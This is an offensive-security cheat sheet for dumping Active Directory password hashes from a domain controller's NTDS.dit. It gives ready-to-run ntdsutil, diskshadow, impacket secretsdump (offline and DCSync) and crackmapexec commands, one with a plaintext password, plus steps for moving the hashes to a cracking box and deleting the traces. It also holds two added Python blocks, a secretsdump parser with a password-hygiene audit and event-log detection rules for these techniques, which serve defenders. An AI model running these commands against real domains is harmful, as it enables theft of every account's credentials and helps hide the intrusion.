Dumping NTDS

Grab the NTDS File

  • Get the NTDS file using ntdsutil.exe → https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration

  • Locate the secretsdump.py script from impacket (typically installed at /usr/share/doc/python3-impacket/examples/).

python secretsdump.py -ntds ntds.dit -system SYSTEM -outputfile clientntds -user-status LOCAL

  • Filter the output so that only enabled domain users remain, using grep and cut or whatever you prefer. Note that -outputfile writes the NTDS hashes to clientntds.ntds, and with -user-status each line ends in (status=Enabled) or (status=Disabled). Something along the lines of

grep Enabled clientntds.ntds | grep acme.com | cut -d " " -f1 > ntds.txt

  • Move the resulting file to the cracking box.

  • Make sure you clean up everything afterwards (delete the shadow copy and the extracted ntds.dit and SYSTEM files).
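The grep/cut step above works on the line format secretsdump.py prints with -user-status (domain\user:rid:lmhash:nthash::: (status=...)). The following is an added example, not code from this page or from impacket: a small parser for that format plus the checks a password auditor actually wants from the same file: which enabled accounts still have an LM hash stored, which have a blank password, and which share the same NT hash. It also keeps built-in accounts such as Administrator (RID 500), which secretsdump prints without a domain prefix and which a plain grep on the domain name silently drops. SAMPLE is constructed; the hash values are the textbook LM/NT hashes of the word "password" and the empty-password constants, not hashes of any real account.

```python
"""Parse secretsdump.py -user-status output and audit it (added example)."""
import re
from collections import defaultdict
from dataclasses import dataclass

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when LM storage is off / password blank
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

# domain\user:rid:lm:nt::: (status=Enabled) -- the domain prefix and status are optional
LINE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:\\]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::"
    r"(?:\s+\(status=(?P<status>\w+)\))?\s*$", re.I)

# Constructed sample of secretsdump output (hashes are the well-known test
# values for "password" and for the empty password, not real accounts).
SAMPLE = r"""
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c::: (status=Enabled)
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: (status=Disabled)
acme.com\jdoe:1105:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c::: (status=Enabled)
acme.com\svc_backup:1108:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c::: (status=Enabled)
acme.com\old_user:1110:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: (status=Disabled)
acme.com\kiosk:1112:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: (status=Enabled)
acme.com\DC01$:1000:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da::: (status=Enabled)
"""


@dataclass
class Account:
    domain: str
    user: str
    rid: int
    lm: str
    nt: str
    status: str  # "Enabled", "Disabled", or "" when -user-status was not used

    @property
    def enabled(self) -> bool:
        return self.status.lower() == "enabled"

    @property
    def is_machine(self) -> bool:
        return self.user.endswith("$")

    def hash_line(self) -> str:
        """Rebuild the bare hash record, i.e. what the cut -f1 step keeps."""
        prefix = f"{self.domain}\\{self.user}" if self.domain else self.user
        return f"{prefix}:{self.rid}:{self.lm}:{self.nt}:::"


def parse_secretsdump(text: str) -> list:
    """Return one Account per hash line; banner and Kerberos-key lines are skipped."""
    accounts = []
    for raw in text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue
        accounts.append(Account(m["domain"] or "", m["user"], int(m["rid"]),
                                m["lm"].lower(), m["nt"].lower(), m["status"] or ""))
    return accounts


def enabled_user_accounts(accounts: list) -> list:
    """Enabled, non-machine accounts, built-ins included (no domain-name grep)."""
    return [a for a in accounts if a.enabled and not a.is_machine]


def audit(accounts: list) -> dict:
    """Password-hygiene findings over the enabled user accounts."""
    live = enabled_user_accounts(accounts)
    by_nt = defaultdict(list)
    for a in live:
        by_nt[a.nt].append(a.user)
    return {
        "lm_stored": [a.user for a in live if a.lm != EMPTY_LM],      # LM hashes still kept
        "blank_password": [a.user for a in live if a.nt == EMPTY_NT],  # empty password
        "shared_nt": {h: u for h, u in by_nt.items() if len(u) > 1},   # password reuse
    }


if __name__ == "__main__":
    accts = parse_secretsdump(SAMPLE)
    for a in enabled_user_accounts(accts):
        print(a.hash_line())
    print(audit(accts))
```

Running the module prints the enabled user records in the same shape the page's cut command produces, followed by the audit findings; pipe a real clientntds.ntds into parse_secretsdump() instead of SAMPLE to use it on actual output.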

No Credentials - ntdsutil

If you have no credentials but do have local access to the DC, it's possible to dump ntds.dit using the lolbin ntdsutil.exe:

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

The ntds.dit file and the SYSTEM and SECURITY registry hives are written to c:\temp.

We can then dump password hashes offline with impacket:

root@~/tools/mitre/ntds# /usr/bin/impacket-secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit local

No Credentials - diskshadow

On Windows Server 2008+, we can use diskshadow to grab the ntds.dit.

Create a diskshadow script (shadow.txt) that creates a new shadow copy of the C: volume (where ntds.dit is located in our case) and exposes it as drive Z:\

shadow.txt

set context persistent nowriters
set metadata c:\exfil\metadata.cab
add volume c: alias trophy
create
expose %trophy% z:

...and now execute the following:

mkdir c:\exfil
diskshadow.exe /s C:\users\Administrator\Desktop\shadow.txt
cmd.exe /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit

The ntds.dit copy is now extracted into our c:\exfil folder.

Inside the interactive diskshadow utility, clean up the shadow volume:

diskshadow.exe
    > delete shadows volume trophy
    > reset

With Credentials

If you have credentials for an account that can log on to the DC, it's possible to dump hashes from NTDS.dit remotely over RPC (the DRSUAPI replication interface, i.e. DCSync) with impacket:

impacket-secretsdump -just-dc-ntlm offense/[email protected]

Using CME

crackmapexec smb 192.168.1.105 -u 'Administrator' -p 'Ignite@987' --ntds drsuapi
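Every method on this page leaves a distinct trace on the DC: ntdsutil with ifm / create full, diskshadow run with a script file, a plain process naming ntds.dit on its command line, and, for secretsdump -just-dc-ntlm or CME --ntds drsuapi, a 4662 directory-service access event showing replication control-access rights used by something other than a domain controller's machine account. The following is an added detection example, not code from the page or from any of the tools it mentions. The event records are constructed dicts shaped like Security 4688 (process creation with command-line auditing) and 4662 fields; the two replication GUIDs are the real DS-Replication-Get-Changes / -All control access rights, and the "non-DC account" test is a heuristic (DCs replicate with their machine account ending in $).

```python
"""Detection logic for the NTDS-dumping techniques described above (added example)."""
import re

# Control access right GUIDs for directory replication (AD schema, well known).
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"

# Command-line patterns. Matching the command line rather than the image also
# catches the page's `powershell "ntdsutil.exe ..."` wrapper on the parent process.
NTDSUTIL_IFM = re.compile(r"ntdsutil.*\b(ifm|create\s+(full|sysvol))\b", re.I)
DISKSHADOW_SCRIPT = re.compile(r"diskshadow(\.exe)?\s+[/-]s\b", re.I)
NTDS_FILE = re.compile(r"ntds\.dit", re.I)


def check_process_event(event: dict) -> list:
    """Rule names triggered by one 4688-style process creation record."""
    if event.get("EventID") != 4688:
        return []
    cmd = event.get("CommandLine", "")
    image = event.get("NewProcessName", "").lower()
    hits = []
    if NTDSUTIL_IFM.search(cmd):
        hits.append("ntdsutil-ifm")
    if DISKSHADOW_SCRIPT.search(cmd):
        hits.append("diskshadow-script")
    # lsass.exe holds ntds.dit open on a live DC; any other process naming the
    # file on its command line (copy from a shadow copy, esentutl, ...) is unusual.
    if NTDS_FILE.search(cmd) and not image.endswith("lsass.exe"):
        hits.append("ntds-dit-access")
    return hits


def check_ds_access_event(event: dict) -> list:
    """Rule names for one 4662 record. Note: 4662 is only written when
    'Audit Directory Service Access' is enabled and the domain object carries
    a SACL for the replication rights; without that there is nothing to match."""
    if event.get("EventID") != 4662:
        return []
    props = event.get("Properties", "").lower()
    user = event.get("SubjectUserName", "")
    uses_replication = (DS_REPLICATION_GET_CHANGES in props
                        or DS_REPLICATION_GET_CHANGES_ALL in props)
    # Heuristic: DCs replicate as their machine account (trailing $); anyone else
    # exercising replication rights deserves a look.
    if uses_replication and not user.endswith("$"):
        return ["replication-by-non-dc"]
    return []


def detect(events: list) -> list:
    """Run both checks over a list of records; returns (rule, user) tuples."""
    alerts = []
    for e in events:
        for rule in check_process_event(e) + check_ds_access_event(e):
            alerts.append((rule, e.get("SubjectUserName", "?")))
    return alerts


# Constructed records mirroring the commands on this page plus two benign ones.
SAMPLE_EVENTS = [
    {"EventID": 4688, "SubjectUserName": "backupadm",
     "NewProcessName": r"C:\Windows\System32\ntdsutil.exe",
     "CommandLine": r'ntdsutil.exe "ac i ntds" ifm "create full c:\temp" q q'},
    {"EventID": 4688, "SubjectUserName": "backupadm",
     "NewProcessName": r"C:\Windows\System32\diskshadow.exe",
     "CommandLine": r"diskshadow.exe /s C:\users\Administrator\Desktop\shadow.txt"},
    {"EventID": 4688, "SubjectUserName": "backupadm",
     "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit"},
    {"EventID": 4688, "SubjectUserName": "dsadmin",  # routine health check, not flagged
     "NewProcessName": r"C:\Windows\System32\ntdsutil.exe",
     "CommandLine": r'ntdsutil.exe "ac i ntds" files info q q'},
    {"EventID": 4662, "SubjectUserName": "jdoe",  # replication rights used by a user account
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "DC02$",  # a real DC replicating, not flagged
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]

if __name__ == "__main__":
    for rule, user in detect(SAMPLE_EVENTS):
        print(f"{rule:24s} {user}")
```

The ntdsutil rule deliberately keys on ifm / create full rather than on "ac i ntds", because activating the instance precedes harmless maintenance commands too (the fourth sample event). Feed real 4688/4662 records with the same field names into detect() to reuse it.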
